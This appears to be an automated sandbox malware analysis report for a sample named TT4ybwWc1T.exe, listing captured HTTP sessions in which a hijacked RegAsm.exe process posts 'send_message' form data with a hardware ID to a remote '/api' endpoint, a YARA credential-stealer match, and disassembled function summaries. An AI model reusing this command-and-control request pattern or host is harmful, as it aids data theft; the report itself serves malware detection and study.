Nov 7, 2023 15:21:13.279448032 CET	27	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=7jq0te7lmralhcv5ma8l8phjll; expires=Sat, 02 Mar 2024 08:07:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LlEKFT0J3DNmQe5mJZGeJzu1lgzWvRTVu4kmh20Gc4FGZ9W8YjTT1gX2K6%2FekBQpVGmpmcSn6sAY0XxvZteZIz%2F3WK%2FdZn2hpSgO2jGXCgKR8DxpfGZ6DfPgyG3LdQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638ab8b522816-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:13.279475927 CET	27	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.8	49712	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:13.442796946 CET	27	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:13.443468094 CET	28	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:13.936122894 CET	29	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=vhd0rrt32onif4ddvpnahub3no; expires=Sat, 02 Mar 2024 08:07:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vNkFP5XdruSVoAZD1FQVNfjyUB52h8Aks%2FXqdnf8rJB6aYQ77czAbIaLzQGeGApKqGc2R5fCsYrb7G8Qow7Z3k6TGqHCYTx4n5PMhMkJoK6KPPMZ89gMZCoIrpHZ5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638af9b95ebcb-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:13.936145067 CET	29	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.8	49713	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:14.106868029 CET	30	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:14.107558966 CET	30	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:14.596968889 CET	32	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=05btqtgpl147j4la8tdbf533v5; expires=Sat, 02 Mar 2024 08:07:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=haX3BXtyj6QjKNnLk%2FjVRUeTKV8dIwrymr%2FMFlgGBCQFUL5laVKozFnAC9uylOv55sGL9RiLzDgOg0CR7gq6RQf6CFpkJFGfaNigQhXLMtUNVhKDY91GaEihTboBtw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638b3cb80307c-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:14.596993923 CET	32	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.8	49714	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:14.762284994 CET	32	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:14.762902021 CET	33	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:15.242305040 CET	34	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=3r3ukq4v8mav6etpe0cujlbh6u; expires=Sat, 02 Mar 2024 08:07:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q29HORMYSscS28ZDbq8RfnLywhTbGwGaeuUxP31YXhsQzOTGJM8KthT49kbhlD0q9QggruAHxgKXsQcpLzYfEIY%2BeJD%2FOxmeptKcQNfMx%2BrQQa4222VHWBJxKjEkuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638b7db682810-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:15.242338896 CET	34	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.8	49715	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:15.416431904 CET	35	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:15.417061090 CET	35	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:15.891875982 CET	37	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=uic911ug4f4gv6caioqh36btcb; expires=Sat, 02 Mar 2024 08:07:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AvRmmmVT%2FhLGeAICDTpoyqdkyJXbVX6PqMapSnUGeEVpJiFGDn0WtX4WmbKvvZfIoY5gFgi8zZRir%2Fz7ihM9FE01oVjY69DlBaEZHstS9svvoDrlO%2B4JjpVqbn8vGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638bbea70c77a-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:15.891930103 CET	37	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:21:06
Start date:	07/11/2023
Path:	C:\Users\user\Desktop\TT4ybwWc1T.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\TT4ybwWc1T.exe
Imagebase:	0x460000
File size:	4'340'736 bytes
MD5 hash:	A7DCEF177AF8AC4D8FF3A4A2FFA635CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:21:07
Start date:	07/11/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x530000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 6C90B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C90B73F
VariantInit.OLEAUT32(?), ref: 6C90B748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90B7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90B7F5
VariantClear.OLEAUT32(?), ref: 6C90B801

Part of subcall function 6C90C850: VariantInit.OLEAUT32(?), ref: 6C90C88F
Part of subcall function 6C90C850: VariantInit.OLEAUT32(?), ref: 6C90C895
Part of subcall function 6C90C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90C8A0
Part of subcall function 6C90C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C90C8D5
Part of subcall function 6C90C850: VariantClear.OLEAUT32(?), ref: 6C90C8E1

VariantClear.OLEAUT32(?), ref: 6C90BA15
SafeArrayDestroy.OLEAUT32(?), ref: 6C90BE90
VariantClear.OLEAUT32(?), ref: 6C90BEA3
VariantClear.OLEAUT32(?), ref: 6C90BEA9

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 443e55f1a90d56ac29a3c27f535a693d9ceba5444c2b4b5da79d7176e972d84f
Instruction ID: 42670d935c68b90db0e100b9f840638f97751cee7417b74d13a0692cefd0e1a5
Opcode Fuzzy Hash: 443e55f1a90d56ac29a3c27f535a693d9ceba5444c2b4b5da79d7176e972d84f
Instruction Fuzzy Hash: 54524A71A002189FDB10DFA8C984BEEBBB9BF59304F25819DE519AB741DB30E945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 074E0EB3 Relevance: 24.6, Strings: 19, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HERE, xrefs: 074E17E9
LOOK, xrefs: 074E12E7
HERE, xrefs: 074E1592
Gq, xrefs: 074E1923
Gq, xrefs: 074E14CA
Gq, xrefs: 074E16D2
LOOK, xrefs: 074E19EB
HERE, xrefs: 074E0F6F
LOOK, xrefs: 074E158D
HERE, xrefs: 074E1086
HERE, xrefs: 074E1AA4
HERE, xrefs: 074E19F0
Gq, xrefs: 074E1243
HERE, xrefs: 074E12EC
LOOK, xrefs: 074E0F6A
Gq, xrefs: 074E1CCD
LOOK, xrefs: 074E1081
LOOK, xrefs: 074E1A9F
LOOK, xrefs: 074E17E4

Memory Dump Source

Source File: 00000000.00000002.1384617521.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$Gq$Gq$Gq$Gq$Gq
API String ID: 0-2962834745
Opcode ID: 152d4ff91f0506d20799c83821b375b4cfd70ca7e245cee1eda8192d5301b4e7
Instruction ID: 7f835d5a071972b7020a56d10cc01e328f3d65e547bdc1120076713345c72364
Opcode Fuzzy Hash: 152d4ff91f0506d20799c83821b375b4cfd70ca7e245cee1eda8192d5301b4e7
Instruction Fuzzy Hash: AF8283B4E402298FDB64DF68C998BD9B7B1BB89310F1485E9D40DAB361DB309E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,65628154), ref: 6C8FB711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6C8FB71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6C8FB730
__cftoe.LIBCMT ref: 6C8FB870
GetModuleHandleW.KERNEL32(?), ref: 6C8FB88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6C8FB8D7

Strings

CLRCreateInstance, xrefs: 6C8FB72A
v4.0.30319, xrefs: 6C8FB767
mscoree.dll, xrefs: 6C8FB70C, 6C8FB717

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: 0b0056c5db4f42f4c77de40ee683c7dc6a4eb6d637b9528aacc775559bf05cde
Instruction ID: 9594641863f32d24930b5286b8f0f9f6b5140b7aab0c0f659b19b2bb695578ec
Opcode Fuzzy Hash: 0b0056c5db4f42f4c77de40ee683c7dc6a4eb6d637b9528aacc775559bf05cde
Instruction Fuzzy Hash: F3917C70E05249DFDB14DFE8C9809AEBBB4FF89314F248A6DE125EB640D730A906CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02ACC290 Relevance: 3.4, Instructions: 3417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38764412d4c575ba093e8aba2178d51a02f242c611de3550df579aecc17642f1
Instruction ID: dc065122ffd5812c517222c27e6749767c9187d402c633d595f810eafcbe2b44
Opcode Fuzzy Hash: 38764412d4c575ba093e8aba2178d51a02f242c611de3550df579aecc17642f1
Instruction Fuzzy Hash: D7730C74A00619CFDB14DF68C988B9DB7B2BF89314F2585A9E409AB361DB31ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 074E26F8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384617521.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b624f35cad22cffea1885bb7c5c575701764e9659061a22e5834389e0c6c1dc3
Instruction ID: 70b759af4546b1adad65e64d2f98b5245d234502ff9ec29e5389a80691e3f99a
Opcode Fuzzy Hash: b624f35cad22cffea1885bb7c5c575701764e9659061a22e5834389e0c6c1dc3
Instruction Fuzzy Hash: F6329274E012289FDB64DFA9C994BDEBBB6BF89300F1085AAD409A7354DB305E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 074E26DC Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384617521.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a9217a88b4ec9db3402dbf218af68c3eeee86768ee72bbc0ec60af99ada8b0
Instruction ID: 97a847b2b78d3c0d26aca20d997fd3409dd6cc6462e6aaf4a0169d5dedbe806a
Opcode Fuzzy Hash: b1a9217a88b4ec9db3402dbf218af68c3eeee86768ee72bbc0ec60af99ada8b0
Instruction Fuzzy Hash: 699116B4E012289FDB64DF69C850BDEBBF2BF89300F0485AAD409AB355DB345A81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6C909357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C9084BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C9084D2
SafeArrayGetElement.OLEAUT32 ref: 6C90850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C9094C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C9094D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6C90950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C9097A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C9097B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6C9097F2

Part of subcall function 6C903A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C903B71
Part of subcall function 6C903A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C903B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C909D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C909D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6C909DAF

Part of subcall function 6C903A90: SafeArrayDestroy.OLEAUT32(?), ref: 6C903BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C90A1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C90A1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6C90A20C
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Strings

A, xrefs: 6C90AD44

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: 1c347eeba0b20ee8770684f3c4dc8e54366d2e11ce78c43e8fc89c490337528d
Instruction ID: f69dea7bf905cb2ba27a2888a731cccd0e09ca053c75737fa4c904e0293f877f
Opcode Fuzzy Hash: 1c347eeba0b20ee8770684f3c4dc8e54366d2e11ce78c43e8fc89c490337528d
Instruction Fuzzy Hash: 05239170A01205DFDB00DFA8C984FDD77B9AF59308F158198EA09AF792DB71E985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C902970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C9029F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C902A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C902A2F
VariantInit.OLEAUT32(?), ref: 6C902ABB
VariantInit.OLEAUT32(?), ref: 6C902B3F
VariantClear.OLEAUT32(?), ref: 6C902C04
VariantClear.OLEAUT32(?), ref: 6C902C0B
VariantClear.OLEAUT32(?), ref: 6C902C12
VariantClear.OLEAUT32(?), ref: 6C902C96
VariantClear.OLEAUT32(?), ref: 6C902C9D
VariantClear.OLEAUT32(?), ref: 6C902CD6
VariantClear.OLEAUT32(?), ref: 6C902CDD
VariantClear.OLEAUT32(?), ref: 6C902CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6C902D1B
VariantClear.OLEAUT32(?), ref: 6C902D45
VariantClear.OLEAUT32(?), ref: 6C902D4C
VariantClear.OLEAUT32(?), ref: 6C902D53

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
